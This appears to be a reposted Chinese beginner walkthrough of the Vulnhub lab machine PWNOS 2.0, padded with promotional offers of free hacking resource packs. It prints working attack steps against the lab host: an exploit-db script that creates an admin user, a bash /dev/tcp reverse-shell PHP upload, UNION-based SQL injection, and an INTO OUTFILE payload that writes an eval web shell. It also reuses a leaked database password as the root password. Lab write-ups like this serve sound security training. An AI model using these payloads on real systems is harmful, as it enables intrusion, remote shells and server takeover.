当前位置: 首页 > news >正文

【网络安全渗透测试零基础入门】之Vulnhub靶场PWNOS: 2.0 多种渗透方法,收藏这一篇就够了!

前言

这是小强给粉丝盆友们整理的网络安全渗透测试入门阶段Vulnhub靶场实战教程

喜欢的朋友们,记得给我点赞支持和收藏一下,关注我,学习黑客技术。

本文介绍靶机PWNOS: 2.0 的渗透方法,由于靶机系统比较老,尝试了几种不同的角度获得shell和提权。

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

1 环境搭建

根据提示信息,需要将网段设置为10.10.10.0/24,靶机ip为10.10.10.100。可以配置仅主机模式或NAT模式网卡,建议使用NAT模式。

本文采用仅主机模式实验:

然后将攻击机(kali2022)和靶机的网卡都设置为VMnet1。

在攻击机中手动设置ip地址:

ifconfig eth0 10.10.10.128 netmask 255.255.255.0  

然后ping一下靶机,确保能连接:

ping -c 4 10.10.10.100  

2 端口扫描

扫描开放端口以及靶机的系统信息

nmap -sV -p- -A 10.10.10.100  

发现开放了http和ssh服务,后续可以先从网站入手。内核版本为比较老的2.6.x。

尝试漏洞扫描:

nmap -sS 10.10.10.100 --script=vuln  

扫描出了两个地方可能有csrf漏洞,这里先不考虑。还有一些网站目录,后续可以访问看看内容。

3 渗透方法一:CMS系统漏洞

访问10.10.10.100/blog

页面像是某个cms系统,可以先用whatweb扫描一下

注意到框架:Simple PHP Blog 0.4.0

查看网页源码信息也可以看到。

直接搜索该框架的漏洞数据:

下面分别尝试这两种方法。

3.1 创建用户+文件上传

查看1191.pl的信息

关注使用方法,注意到第三个方法可以创建新用户。

利用脚本:

cp /usr/share/exploitdb/exploits/php/webapps/1191.pl /root  
perl 1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P 123  

成功创建了admin:123的用户。

使用创建的新用户登录

登录成功后在菜单中发现上传图片的按钮:

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

这里并没有对上传的文件做过滤,于是可以写入反弹连接的木马上传到服务器,反弹连接到kali的8888端口。

echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/8888 0>&1'\"); ?>" > shell.php  

通过猜测或者目录扫描,可以发现文件上传的目录为 http://10.10.10.100/blog/images/

先监听端口:

直接访问http://10.10.10.100/blog/images/shell.php。

成功拿到shell

3.2 使用msf利用RCE

打开msfconsole找到对应漏洞

设置攻击机和靶机的ip和URI即可。

成功获得shell

4 渗透方法二:SQL注入

本文使用手工sql注入的方法,使用bp浏览器访问登录页面,随便输入一个用户名密码抓包:

在repeater模块,修改email字段的值为1’

此时发现sql语句报错的信息,说明此处存在sql注入。

采用’ union select 1 – - 的方式不断增加列数,直到回显信息不再报错为止。

' union select 1 -- -   
' union select 1,2 -- -   
...  
' union select 1,2,3,4,5,6,7,8 -- - 

一直到第8列,回显信息有Welcome 4,第4个字段可能是可利用字段,把它改成version()试试能不能回显版本信息。

结果发现能看到版本信息,于是可以通过这个注入点搜集数据库各种信息。

通过sql注入在根目录下写入一句话木马:

' union select null,null,null,"<?php @eval($_POST['123']); ?>",null,null,null,null into outfile '/var/www/ok.php' -- - 

用蚁剑连接

5 提权

拿到shell后,查看var目录下的文件:

发现文件mysqli_connect.php,可能是个数据库配置文件,查看该文件:

直接用这个密码登录系统root用户,发现可以成功登录

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~


http://www.mrgr.cn/news/71205.html

相关文章:

  • 10款PDF翻译工具的探索之旅:我的使用经历与工具特色!!
  • python printf中文乱码
  • sqoop import将Oracle数据加载至hive,数据量变少,只能导入一个mapper的数据量
  • 模型压缩概览
  • unity基础,点乘叉乘。
  • Three.js 搭建3D隧道监测
  • FAS在数据库环境中应用详解
  • 逻辑数据编织平台现代企业数据管理和分析的理想选择
  • SQL面试题——奔驰面试题
  • 创业铁盘论
  • 超级计算机挑战人类智力,谁才是最后赢家?
  • 发社交动态,小心它泄露了你的隐私——不只是地理位置,还有眼神中倒影成像
  • 百度世界2024:AI应用的浪潮时刻
  • Docker--Docker是什么和对Docker的了解
  • 为什么管道符|无法写入txt
  • 【GPTs】Email Responder Pro:高效生成专业回复邮件
  • 局域网桥接只能单向ping问题,arp无法建立
  • 【缓存策略】你知道 Write Through(直写)这个缓存策略吗?
  • 1.vue环境搭建
  • 如何快速查看在 GitHub 上的所有PR提交记录
  • 微信机器人接入聊天模块
  • fastapi 查询参数支持 Pydantic Model:参数校验与配置技巧
  • IntelliJ+SpringBoot项目实战(四)--快速上手数据库开发
  • 【Python进阶】Python中的数据库交互:使用SQLite进行本地数据存储
  • 【蓝桥等考C++真题】蓝桥杯等级考试C++组第13级L13真题原题(含答案)-小蓝的目标
  • 国标GB28181-2022平台EasyGBS国标GB28181软件在GB/T28181协议中的加密措施